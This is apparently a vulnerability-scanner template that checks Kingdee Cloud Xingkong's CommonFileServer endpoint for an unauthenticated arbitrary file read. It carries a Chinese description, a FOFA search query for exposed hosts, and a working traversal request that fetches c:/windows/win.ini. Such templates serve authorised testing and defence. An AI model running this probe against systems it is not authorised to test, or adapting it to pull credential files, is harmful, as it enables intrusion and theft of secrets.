id: Kingdee-Cloud-read-CommonFileServer

info:
  name:  Kingdee-Cloud-read-CommonFileServer 
  author: p1z
  severity: high
  description: |
     由于金蝶云星空CommonFileServer接口处权限设置不当，未经身份认证的攻击者可以利用此漏洞访问服务器上的任意文件，包括数据库凭据、API密钥、配置文件等，从而获取系统权限和敏感信息。
  reference:
    https://blog.csdn.net/qq_41904294/article/details/132030706
  metadata:
    fofa-query: app="金蝶云星空-管理中心"
    hunter-query:
    verified: true
  tags: 2023,Kingdee-Cloud,read

requests:
  - method: GET
    path:
      - "{{BaseURL}}/CommonFileServer/c%3A%2Fwindows%2Fwin.ini"
    matchers:
      - type: word
        words:
          - "Mail"